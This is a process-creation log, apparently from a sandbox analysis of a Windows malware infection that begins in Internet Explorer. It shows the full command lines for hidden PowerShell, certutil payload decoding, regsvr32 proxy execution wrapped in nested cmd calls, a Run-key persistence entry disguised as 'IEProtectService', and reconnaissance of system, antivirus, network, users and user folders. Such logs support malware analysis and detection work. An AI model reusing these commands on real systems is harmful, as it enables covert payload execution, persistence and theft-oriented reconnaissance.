iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2716 CREDAT:145409
2788
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\wGoWlR2.lVRJ C:\Windows\..\ProgramData\xQAW1Xg.bYhB
2080
certutil.exe "C:\Windows\system32\certutil.exe" -decode C:\Windows\..\ProgramData\wGoWlR2.lVRJ C:\Windows\..\ProgramData\xQAW1Xg.bYhB
2184
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden cmd /c cmd /c cmd /c cmd /c regsvr32.exe /s /n /i:1qaz2wsx5tgb C:\Windows\..\ProgramData\xQAW1Xg.bYhB
2536
cmd.exe "C:\Windows\system32\cmd.exe" /c cmd /c cmd /c cmd /c regsvr32.exe /s /n /i:1qaz2wsx5tgb C:\Windows\..\ProgramData\xQAW1Xg.bYhB
2664
cmd.exe cmd /c cmd /c cmd /c regsvr32.exe /s /n /i:1qaz2wsx5tgb C:\Windows\..\ProgramData\xQAW1Xg.bYhB
2800
cmd.exe cmd /c cmd /c regsvr32.exe /s /n /i:1qaz2wsx5tgb C:\Windows\..\ProgramData\xQAW1Xg.bYhB
3052
reg.exe reg add hkcu\software\microsoft\windows\currentversion\run -d "regsvr32.exe /s /n /i:1qaz2wsx5tgb \"C:\Users\test22\AppData\Roaming\IEServer\Update\IEServiceUpdate.dat\"" -t REG_SZ -v "IEProtectService" -f
1576
cmd.exe cmd /c C:\Users\test22\AppData\Roaming\temp\B6A9.tmp.bat
2300
regsvr32.exe regsvr32.exe /s /n /i:1qaz2wsx5tgb \"C:\Users\test22\AppData\Roaming\IEServer\Update\IEServiceUpdate.dat\"
1364
cmd.exe c:\windows\system32\cmd.exe /c systeminfo & powershell Get-CimInstance -Namespace root/SecurityCenter2 -Classname AntivirusProduct & ipconfig /all & arp -a & net user & query user & dir "%programfiles%" & dir "%programfiles% (x86)" & dir "%programdata%\Microsoft\Windows\Start Menu\Programs" /s dir "%appdata%\Microsoft\Windows\Recent" & dir "%userprofile%\desktop" /s & dir "%userprofile%\downloads" /s & dir "%userprofile%\documents" /s
2064
systeminfo.exe systeminfo
1064
powershell.exe powershell Get-CimInstance -Namespace root/SecurityCenter2 -Classname AntivirusProduct
2136
ipconfig.exe ipconfig /all
2228
ARP.EXE arp -a
3012
net1.exe C:\Windows\system32\net1 user
3036
quser.exe "C:\Windows\system32\quser.exe"
3032
cmd.exe cmd /c C:\Users\test22\AppData\Roaming\temp\D7F0.tmp.bat
2516
explorer.exe C:\Windows\Explorer.EXE
1452